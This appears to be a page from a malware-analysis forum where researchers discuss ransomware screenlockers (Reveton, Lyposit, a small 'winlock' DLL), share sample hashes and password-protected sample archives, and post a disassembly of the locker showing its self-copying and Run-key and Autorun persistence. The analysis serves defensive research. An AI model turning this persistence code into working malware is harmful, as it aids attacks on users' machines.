A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #16222  by Cody Johnston
 Tue Oct 23, 2012 2:10 am
@Quads -

The hidden partition is part of the SST rootkit. These 2 infections are commonly seen together. I believe I mentioned it in a blog post a while back.
 #16223  by thisisu
 Tue Oct 23, 2012 2:41 am
Remember that the hidden partition (the one related to TDL4) isn't going to be over 11MB.

The one you listed is 11 GB

In your case, it's Toshiba's recovery partition.
 #16224  by Quads
 Tue Oct 23, 2012 2:50 am
TeamRocketOps

I know what the partition type 17 means normally in the past as I have fixed machines in the past with this (sometimes with more than one of these to remove), but with the 2 machines I have turns out as I start and continue to investigate more that Toshiba Machines do have one of there types of partitions (type 17) ranging from 10 to 15 GB in size which is why I stopped with those 2 machines the GB size is very large for SST

Compared to the SST partitions I have dealt with between 2MB and 15MB, much smaller than GB sizes

Quads
 #17083  by EP_X0FF
 Sun Dec 09, 2012 12:13 pm
Split.

AutoIt Ransomware moved to Trojan:AutoIt/LockScreen
Reveton related posts moved to Trojan:Win32/Reveton
Tobfy and clones moved to Trojan:Win32/Tobfy
Weelsof related posts moved to Trojan:Win32/Weelsof

Several dumb/offtop posts have been removed.

Note: something from above lockers maybe missed, content will be moved with time.

Note2: When you attach sample here, please add hash or VT/any other scanner link. This can be useful for search.
 #17208  by EP_X0FF
 Sun Dec 16, 2012 2:27 am
hx1997 wrote:MD5: 42F2AFB3F6EBAB257415A0539A80E6FA
Code: Select all
C:\WINDOWS\system32\rundll32.exe C:\Users\GATEWA~1\wgsdgsdgdsgsd.exe,exp
Different. Also uses full screen IE embedded window and create new desktop Desk_Two to switch to it.

Slightly longer description can be found here http://www.microsoft.com/security/porta ... kScreen.CO

Pages:

geoldremover.org/?d31437d5bc1ac6cdce4821a8c2c81438
shouldersurfingwaiting.pro/?d31437d5bc1ac6cdce4821a8c2c81438

Smallest winlock, decrypted actual size ~4.5 Kb :)
Code: Select all
.text:10001000 ; BOOL __stdcall DllEntryPoint(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpReserved)
.text:10001000                 public DllEntryPoint
.text:10001000 DllEntryPoint   proc near
.text:10001000
.text:10001000 var_8           = dword ptr -8
.text:10001000 hinstDLL        = dword ptr  4
.text:10001000 fdwReason       = dword ptr  8
.text:10001000 lpReserved      = dword ptr  0Ch
.text:10001000
.text:10001000                 push    ebx
.text:10001001                 xor     ebx, ebx
.text:10001003                 dec     [esp+4+fdwReason]
.text:10001007                 jnz     jz_AlreadyRunning
.text:1000100D                 mov     eax, [esp+4+hinstDLL]
.text:10001011                 mov     hModule, eax
.text:10001016                 push    MAX_PATH        ; nSize
.text:1000101B                 push    offset ExistingFileName ; lpFilename
.text:10001020                 push    ebx             ; hModule
.text:10001021                 call    ds:GetModuleFileNameA
.text:10001027                 push    5Ch
.text:10001029                 push    ebx
.text:1000102A                 push    offset ExistingFileName
.text:1000102F                 call    ds:StrRChrA
.text:10001035                 inc     eax
.text:10001036                 push    offset String2  ; "iexplore.exe"
.text:1000103B                 push    eax             ; lpString1
.text:1000103C                 call    ds:lstrcmpiA
.text:10001042                 or      eax, eax
.text:10001044                 jnz     short jnz_NotIE
.text:10001046                 push    offset Name     ; "dllDesk_mutex"
.text:1000104B                 push    ebx             ; bInitialOwner
.text:1000104C                 push    ebx             ; lpMutexAttributes
.text:1000104D                 call    ds:CreateMutexA
.text:10001053                 test    eax, eax
.text:10001055                 jz      jz_AlreadyRunning
.text:1000105B                 call    ds:GetLastError
.text:10001061                 cmp     eax, ERROR_ALREADY_EXISTS
.text:10001066                 jz      jz_AlreadyRunning
.text:1000106C                 push    offset ThreadId ; lpThreadId
.text:10001071                 push    ebx             ; dwCreationFlags
.text:10001072                 push    ebx             ; lpParameter
.text:10001073                 push    offset IEWndProc ; lpStartAddress
.text:10001078                 push    ebx             ; dwStackSize
.text:10001079                 push    ebx             ; lpThreadAttributes
.text:1000107A                 call    ds:CreateThread
.text:10001080
.text:10001080 jnz_NotIE:                              
.text:10001080                 push    offset aRundll32_exe ; "rundll32.exe \""
.text:10001085                 push    offset Data     ; lpString1
.text:1000108A                 call    ds:lstrcpyA
.text:10001090                 push    offset CurrentFileName ; pszPath
.text:10001095                 push    ebx             ; dwFlags
.text:10001096                 push    ebx             ; hToken
.text:10001097                 push    CSIDL_APPDATA   ; csidl
.text:10001099                 push    ebx             ; hwnd
.text:1000109A                 call    ds:SHGetFolderPathA
.text:100010A0                 push    offset aDllexp_dll ; "\\dllexp.dll"
.text:100010A5                 push    offset CurrentFileName ; lpString1
.text:100010AA                 call    ds:lstrcatA
.text:100010B0                 push    MAX_PATH        ; nSize
.text:100010B5                 push    offset ExistingFileName ; lpFilename
.text:100010BA                 push    hModule         ; hModule
.text:100010C0                 call    ds:GetModuleFileNameA
.text:100010C6                 push    offset CurrentFileName ; lpString2
.text:100010CB                 push    offset ExistingFileName ; lpString1
.text:100010D0                 call    ds:lstrcmpiA
.text:100010D6                 or      eax, eax
.text:100010D8                 jz      short jz_AlreadyRunning
.text:100010DA                 push    ebx             ; bFailIfExists
.text:100010DB                 push    offset CurrentFileName ; lpNewFileName
.text:100010E0                 push    offset ExistingFileName ; lpExistingFileName
.text:100010E5                 call    ds:CopyFileA
.text:100010EB                 push    offset aExp_0   ; "\",exp"
.text:100010F0                 push    offset CurrentFileName ; lpString1
.text:100010F5                 call    ds:lstrcatA
.text:100010FB                 push    eax             ; hKey
.text:100010FC                 push    esp             ; phkResult
.text:100010FD                 push    KEY_SET_VALUE   ; samDesired
.text:100010FF                 push    ebx             ; ulOptions
.text:10001100                 push    offset SubKey   ; "Software\\Microsoft\\Windows\\CurrentVersi"...
.text:10001105                 push    HKEY_CURRENT_USER ; hKey
.text:1000110A                 call    ds:RegOpenKeyExA
.text:10001110                 push    offset Data     ; lpString
.text:10001115                 call    ds:lstrlenA
.text:1000111B                 mov     edx, [esp+8+var_8]
.text:1000111E                 push    eax             ; cbData
.text:1000111F                 push    offset Data     ; lpData
.text:10001124                 push    REG_SZ          ; dwType
.text:10001126                 push    ebx             ; Reserved
.text:10001127                 push    offset ValueName ; "dllexp"
.text:1000112C                 push    edx             ; hKey
.text:1000112D                 call    ds:RegSetValueExA
.text:10001133                 call    ds:RegCloseKey
.text:10001139                 push    ebx             ; nShowCmd
.text:1000113A                 push    ebx             ; lpDirectory
.text:1000113B                 push    offset Parameters ; lpParameters
.text:10001140                 push    offset File     ; "rundll32.exe"
.text:10001145                 push    ebx             ; lpOperation
.text:10001146                 push    ebx             ; hwnd
.text:10001147                 call    ds:ShellExecuteA
.text:1000114D
.text:1000114D jz_AlreadyRunning:                     
.text:1000114D                                         
.text:1000114D                 mov     al, 1
.text:1000114F                 pop     ebx
.text:10001150                 retn    0Ch
.text:10001150 DllEntryPoint   endp
background.jpg
background.jpg (190.47 KiB) Viewed 778 times
Attachments
pass: malware
(1.93 KiB) Downloaded 114 times
 #17444  by rough_spear
 Sat Dec 29, 2012 1:47 pm
Hi All, :D
Bunch of Trojan-Ransom total 22 files.

List of MD5
8A86B858C947DD68703E9205B280CC01
0AE5E24F55D77C691BA2152A0A56BCA5
B69F073DCAA8AE557A51D4013FF2E014
96BC48F3B61FFA3D99F2F5E83DE69AF5
6A732D670FF5B0FC0F5D220F0E8FB332
0ED380A2D110DDAB791763F63DBF9B66
FD6F13AB6A110713A620AD78BD97779F
AA7674ED78532F4A434C3F8E6F116F6B
C78B5917D231E674591C78CDCB1C5677
4CF4021F10A8799436FFC408E8CA9A13
A77EA3A7FD51AC8D13B3D946538F1977
68758279D5A09478BC9873556733201E
1CD80132358BF2EE362119DC1E44C5B5
54A54EE7C9056ECE0641D74E45572D00
6A01B49335E7687AA0C1A9E13B40268D
D96592A4E5533FC7D918046ADA5A158D
AD8CEB22E4022D6B3F14EAFE1D3D492F
2AAB2AAFA10A1B84202BF99BB359F5CA
9C77EA86FF0A091BC5517D927FB35FBC
1E933774035F7B2FB191D8FD6083A7F8
E4C241BCA037868D75BD11C841623C35
72B9E8BFAAF4B255A7E6257DD5AB38C2

Regards,

rough_spear. ;)
Attachments
password - infected.
(2.75 MiB) Downloaded 135 times
 #17764  by Cody Johnston
 Sat Jan 19, 2013 11:40 pm
This one I thought I had to fix exe associations to get tools to run, but found that this one is sneakier than that. MS calls this one 'Lyposit'.

Places exe and %allusersprofile%\Application Data\<random.exe>

Makes reg key:
HKCU\Software\Microsoft\Command Processor
Autorun = <image path to malware>

Also has funny string in MUI cache:

Image

VT: 25/44
https://www.virustotal.com/file/bf4d14f ... /analysis/

This one is ICC screenlocker same as in the past, looks like file is from about 3 weeks ago

Image

MD5: 76ac324df35bf1dbfea30c629f63d19c
Attachments
Password: infected
(106.45 KiB) Downloaded 120 times
  • 1
  • 10
  • 11
  • 12
  • 13
  • 14